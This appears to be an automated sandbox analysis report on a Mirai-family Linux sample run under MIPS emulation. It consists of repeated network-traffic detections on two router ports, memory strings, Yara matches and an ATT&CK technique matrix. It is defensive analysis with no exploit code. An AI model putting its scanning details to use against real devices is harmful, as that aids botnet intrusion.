                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32984 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47470 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47476 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34570 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53304 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53306 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35186 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45234 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55076 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39868 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60952 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50794 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 44310 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56666 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39056 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35706 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54786 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54788 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 54786
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 54788
                Source: unknownNetwork traffic detected: HTTP traffic on port 42692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57520 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40002 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42698 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 42692
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 42698
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40710 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51888 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33818 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33826 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41702 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60582 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60588 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36356 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33274 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33280 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58256 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59996 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51758 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51762 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43294 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36678 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43404 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 36684 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42604 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 37940
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 53156
                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 58294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56260 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47454 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43708 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56410 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35548 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53924 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56260 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 37886 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 45150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39678 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35184 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 41240 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 42800 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 55298 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 38098 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56260 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56306 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 56646 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43726 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53570 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 43738 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 53576 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 51014 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 39678 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 33876 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 47024 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 59052 -> 52869
                Source: /tmp/w66OTKGVFv (PID: 5247)Queries kernel information via 'uname':
                Source: w66OTKGVFv, 5247.1.00000000f139f5e5.00000000350e6a7c.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/w66OTKGVFvSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/w66OTKGVFv
                Source: w66OTKGVFv, 5247.1.00000000c38ffd63.0000000047cefd1d.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
                Source: w66OTKGVFv, 5247.1.00000000c38ffd63.0000000047cefd1d.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
                Source: w66OTKGVFv, 5247.1.00000000f139f5e5.00000000350e6a7c.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

                Stealing of Sensitive Information:

                barindex
                Yara detected MiraiShow sources
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: w66OTKGVFv, type: SAMPLE
                Source: Yara matchFile source: 5268.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5256.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5250.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5292.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5276.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5273.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5249.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5247.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected MiraiShow sources
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: w66OTKGVFv, type: SAMPLE
                Source: Yara matchFile source: 5268.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5256.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5250.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5292.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5276.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5273.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5249.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 5247.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsIngress Tool Transfer2Manipulate Device CommunicationManipulate App Store Rankings or Ratings

                Malware Configuration

                No configs have been found

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
